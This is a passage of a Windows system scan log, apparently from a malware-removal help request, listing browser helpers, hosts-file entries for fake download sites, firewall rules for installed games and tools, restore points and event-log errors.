2020-10-05 22:07 - 2015-06-10 10:16 - 001304064 _____ (The ICU Project) [File not signed] C:\Users\Tomika\.odrive\bin\6729\icuuc52.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000087040 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCollect.dll
2017-12-11 22:18 - 2017-03-01 11:30 - 000197632 _____ (Wondershare) [File not signed] [File is in use] C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppCommon.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Tomika\AppData\Local\Temp:com.affinity.publisher.1 [241]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.1\bin\jp2ssv.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2020-08-12] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2020-03-13 10:57 - 000001256 _____ C:\Windows\system32\drivers\etc\hosts
109.94.209.70 fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 fitgirl-repack.com # Fake FitGirl site
109.94.209.70 www.fitgirlrepacks.co # Fake FitGirl site
109.94.209.70 www.fitgirl-repacks.cc # Fake FitGirl site
109.94.209.70 www.fitgirl-repack.com # Fake FitGirl site

2016-05-06 18:24 - 2016-06-16 16:34 - 000000511 _____ C:\Windows\system32\drivers\etc\hosts.ics
5 13 16 50 17 837
192.168.137.1 Tom.mshome.net # 2021 5 3 5 21 35 24 561

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Python37-32\Scripts\;C:\Program Files (x86)\Python37-32\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\Microsoft.NET\Framework\v2.0.50727;D:\Programy\LLVM\bin;C:\Program Files\dotnet\;C:\Program Files\Git\cmd;C:\Program Files (x86)\Mitov\Visuino
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.81.1 - 213.46.172.38
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

Network Binding:
=============
Ethernet: Npcap Packet Driver (NPCAP) -> insecure_npcap (enabled)

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{9AD01E6D-EDE0-4C26-8794-C1ACDF29844C}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [UDP Query User{A737DDAD-B775-42F7-969B-B54749BB548F}D:\programy\hearthstone\hearthstone.exe] => (Allow) D:\programy\hearthstone\hearthstone.exe => No File
FirewallRules: [{C0BFCA61-6769-4387-99FB-313A10D98354}] => (Allow) LPort=1542
FirewallRules: [{F504ABC0-A8FD-4D88-872C-BFB0357F7DDB}] => (Allow) LPort=1542
FirewallRules: [{1F8EB603-5FF8-4688-8E08-79E2DA138F65}] => (Allow) LPort=53
FirewallRules: [TCP Query User{3462722B-DE6F-4647-9F68-0E5009544BFA}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [UDP Query User{2CF8A8C3-A1C3-4199-99CC-D51EB01C5B64}D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe] => (Allow) D:\download\download_chrome\ij150-win-java8\imagej\imagej.exe () [File not signed]
FirewallRules: [{9CADBC3E-64E4-40F6-A8F6-C6D24135B717}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{79C6053B-6247-46D6-8E3B-B95FBFDE571A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{18774EFC-EDAD-4F19-BCE4-BA023A4A898E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{1F714EF3-F860-426A-A9EC-0A32EDC7BC3A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{40D21C12-D563-4D39-B50E-056DD7852CFD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{EB44BCFA-7554-4888-93B9-456144AA6ED0}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{440F975A-77E6-4DC1-857F-5D47B5EF6175}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\UPlayBrowser.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{3B0A6297-0985-4D08-8FD1-99DB730EFBBD}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{E318FA87-164F-4371-9CD7-830A02EA7E57}] => (Allow) D:\Programy\steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{8085AEA6-DBC3-4EDC-8B9C-6C73487D5161}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{710EA0F8-1658-43F9-8E62-A185324EE35E}] => (Allow) D:\Programy\steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{84F54D52-BF8C-4DE7-B761-67F42861E894}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{DAB6E844-69B2-4A0D-B4D7-FEA33AE13AA0}] => (Allow) D:\Programy\wolfram mathematica 11\Mathematica.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{52570D7A-3FDB-47AC-96E1-1CD4749A6AC5}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{72C16DE6-5F6E-4C7A-A05A-D8E6CA5BDD48}] => (Allow) D:\Programy\wolfram mathematica 11\MathKernel.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{64C1867B-06C3-4F4D-BFEE-BFD5E8FD454A}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{536FD2FD-654E-4B01-BA28-18CAB6CC6173}] => (Allow) D:\Programy\wolfram mathematica 11\math.exe (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FirewallRules: [{86092937-B01E-44C7-98CA-78F067D83097}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{D822C388-756D-419B-A32F-077778123373}] => (Allow) D:\Programy\PotPlayer\PotPlayerMini64.exe (Kakao corp. -> Kakao)
FirewallRules: [{9483F894-9CD7-40D9-97A4-9A254B38B2E2}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{4B073B04-BB23-4AF4-9D01-18F6A857C5A5}] => (Allow) D:\Programy\Mr DJ\Call of Duty 2\CoD2SP_s.exe () [File not signed]
FirewallRules: [{3F5D3EC2-8C07-48A9-A1E7-549AA8E798EF}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{DC89694B-B938-4F52-AE55-815B8176FEF1}] => (Allow) D:\Programy\Ubisoft Game Launcher\games\Assassin's Creed II\AssassinsCreedIIGame.exe (Ubisoft Entertainment -> )
FirewallRules: [{45D9FC93-D3D0-492B-8F49-63DB88E81B86}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{D2F17CF0-FBCA-441F-8FDE-A97D1AFED72C}] => (Allow) D:\Programy\steam\steamapps\common\Alien Swarm Reactive Drop\reactivedrop.exe () [File not signed]
FirewallRules: [{1A7722A8-6C68-4E08-9654-EE38A7DE4A6C}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{1B1A54D2-02ED-4791-BF2F-EDD3B463C46E}] => (Allow) D:\Programy\steam\steamapps\common\Torchlight II\ModLauncher.exe (Runic Games, Inc. -> Runic Games, Inc.)
FirewallRules: [{C42697B3-7F4A-437C-B4B8-74107E0DFCD7}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{90D1047B-2E4D-46BB-B7E8-DF05DF213F14}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{0175C92F-A1AD-4D10-8E4C-CF3D2DD72C44}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{58B05CB9-C375-4D64-8906-28E5F17E4EE8}] => (Allow) D:\Programy\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{C967F151-1891-4F21-86EB-ECF7811CD148}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{DE3B2D5D-EBE7-4127-8B80-E91C3EA67D63}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{526DDF0E-F163-44E3-8E56-F8608F65A9F8}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [{769336BD-9379-4490-8F9F-E9FA1CC2DCAB}] => (Allow) C:\Users\Tomika\Downloads\Lindo-2.2.0-win\Lindo.exe (Prixe) [File not signed]
FirewallRules: [TCP Query User{58028633-BF2A-440C-A580-BF4C8A4AA820}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{2A70850E-96CF-47FB-9C90-E3E834183FC8}D:\download\download_torrenty\foundation.v1.0.15\foundation.exe] => (Allow) D:\download\download_torrenty\foundation.v1.0.15\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [{DF3AB8C6-D5A5-4D24-B8B9-3638A08EC446}] => (Allow) D:\Programy\Davinci\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{90E1D846-5A9C-4EC5-A6B7-586E01CFF434}] => (Allow) D:\Programy\Davinci\bmdpaneld.exe () [File not signed]
FirewallRules: [{D761FCC8-0F10-4D82-BE98-4050364F04A5}] => (Allow) D:\Programy\Davinci\DaVinciPanelDaemon.exe () [File not signed]
FirewallRules: [{76BFF8C8-BF48-47CB-ABA4-B5E82F0092F1}] => (Allow) D:\Programy\Davinci\JLCooperPanelDaemon.exe () [File not signed]
FirewallRules: [{3B3E0F92-9C5A-4438-BE0E-F5270535AE28}] => (Allow) D:\Programy\Davinci\EuphonixPanelDaemon.exe () [File not signed]
FirewallRules: [{6EFDD34F-0329-4EFC-95E8-FC81B0AC31E6}] => (Allow) D:\Programy\Davinci\TangentPanelDaemon.exe () [File not signed]
FirewallRules: [{6E00C352-B8B4-4A2F-8CDF-D1F3527383C5}] => (Allow) D:\Programy\Davinci\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [TCP Query User{455134ED-7753-4DAA-9476-D27AC787F88F}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D44AE864-5838-42D9-83BA-8489DF255FC8}D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe] => (Block) D:\download\download_torrenty\the.flame.in.the.flood.v1.3.003\rivergame\binaries\win64\rivergame-win64-shipping.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{9219AFA1-328C-4A5F-940B-2B4CEDB13268}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9593C68A-1FB3-401D-B3D1-94DE01DC259D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{AC130793-2F89-41A6-8F71-BD60903E5296}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{278E464D-115C-4F75-8C47-85993E13BF84}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{FFC2B8AE-1939-4CCB-BEBF-9F490C9824FD}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [{9ED468EA-581E-4246-B93F-5916686EA2D8}] => (Allow) D:\Games\Nuked Cockroach Launcher\Nuked_Cockroach_Launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{C739BBFF-E446-45DB-944D-7B4F5076D9A2}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [UDP Query User{A8866385-5792-4382-BC8A-D85DF28E84FE}D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe] => (Allow) D:\games\nuked cockroach launcher\veterans online\default\game\veterans online.exe () [File not signed]
FirewallRules: [TCP Query User{7DD8787E-C39E-492D-B408-1EBE71BA1033}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [UDP Query User{19498341-E34B-4AD7-8763-750721C1E717}D:\games\nuked cockroach launcher\launcher.exe] => (Allow) D:\games\nuked cockroach launcher\launcher.exe (XSOLLA) [File not signed]
FirewallRules: [TCP Query User{40725FB9-3F90-459F-AFCB-8F49624A8371}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [UDP Query User{B96FE167-8E44-4F35-8659-15B21539D00D}D:\programy\arduino\java\bin\javaw.exe] => (Allow) D:\programy\arduino\java\bin\javaw.exe
FirewallRules: [{B6609402-D440-46AB-A838-3492539975C8}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{973AD33C-750E-4AEF-9E33-45E7C1B41823}] => (Allow) D:\Programy\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{253B106F-1C56-48CB-B28D-46DB43BEB0D9}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{851ADD7C-BEDD-4C11-BE3E-59E9697058C5}] => (Allow) D:\Programy\steam\steamapps\common\We Were Here\We Were Here VR.exe => No File
FirewallRules: [{6D8B4E9E-398F-4BE6-8191-6236039CD875}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [{2A4160D9-8A8D-4D49-8EC2-5799EEC41DFE}] => (Allow) D:\Programy\steam\steamapps\common\Lara Croft and the Temple of Osiris\LC2.exe (Square Enix Ltd.) [File not signed]
FirewallRules: [TCP Query User{B0830E4B-499A-46AD-B5EB-4630A4AE2BBF}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [UDP Query User{43CBB4F4-2E71-41CE-B0CA-F8EAE8F74F09}C:\users\tomika\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\tomika\appdata\local\gamecenter\gamecenter.exe (Mail.Ru LLC -> )
FirewallRules: [TCP Query User{816B0942-C37F-4F80-BEA2-7E3C90414862}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [UDP Query User{D031D023-83AB-49B8-8086-1452092B4A60}D:\mygames\warface my.com\bin64release\game.exe] => (Allow) D:\mygames\warface my.com\bin64release\game.exe (warface -> Crytek GmbH)
FirewallRules: [TCP Query User{7CB2C87F-404A-41EF-9381-B51BD7A9AD61}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [UDP Query User{B0E49713-2170-4625-8CE7-1947CF2445D5}D:\games\desperados 3\desperados iii.exe] => (Allow) D:\games\desperados 3\desperados iii.exe () [File not signed]
FirewallRules: [TCP Query User{9A5A2BD0-35C2-4DDF-A5C6-E6DBC6D64655}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [UDP Query User{149E8202-B5BE-4B0F-BF46-CC86E6625851}D:\download\anydesk.exe] => (Allow) D:\download\anydesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{CDCDCA1D-A959-4A82-A5F8-0C2C67C2C231}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1BD88D15-D993-4345-BF4F-535DEE0A908E}] => (Allow) D:\Programy\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A925788E-9D19-4369-88A0-D0FA8376AE79}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{1F853AED-4107-4F14-BDDF-ED58CB05BDC3}] => (Allow) D:\Programy\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{06D1F245-05F2-409F-A4BE-9837E07CD260}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{2569DC12-C2E2-4F91-88CA-7632295A63DE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{1A2359B7-F628-4318-A8B1-6AD77A67BCAA}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{4D399D8C-48FA-4BA2-8612-E595A8C33A6E}D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe] => (Allow) D:\programy\steam\steamapps\common\tera\client\binaries\tera.exe (KRAFTON, Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{984671D7-51AF-4F30-BF3B-8DE783B344B9}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [UDP Query User{4544E668-7F0F-4E2B-A3E8-5825E1798ABB}D:\games\wasteland 3\wl3.exe] => (Block) D:\games\wasteland 3\wl3.exe () [File not signed]
FirewallRules: [{406231D4-1E8F-4951-A3F0-C9DE3789D466}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-10-2020 13:33:03 Scheduled Checkpoint
09-10-2020 19:32:01 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660
09-10-2020 19:32:10 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649
13-10-2020 20:26:05 Windows Update
22-10-2020 20:30:31 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/23/2020 08:29:14 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=4

Error: (10/23/2020 08:29:12 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/22/2020 08:30:32 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (10/22/2020 08:15:31 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/22/2020 08:14:44 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/22/2020 07:47:54 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=3

Error: (10/22/2020 07:47:50 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (10/22/2020 07:47:00 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=TimerEvent


System errors:
=============
Error: (10/23/2020 09:33:42 AM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.

Error: (10/23/2020 09:33:12 AM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} did not register with DCOM within the required timeout.

Error: (10/22/2020 11:37:26 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (10/22/2020 08:19:36 PM) (Source: DCOM) (EventID: 10010) (User: Tom)
Description: The server {1B1F472E-3221-4826-97DB-2C2324D389AE} did not register with DCOM within the required timeout.

Error: (10/22/2020 08:19:06 PM) (Source: DCOM) (EventID: 10010) (User: Tom)
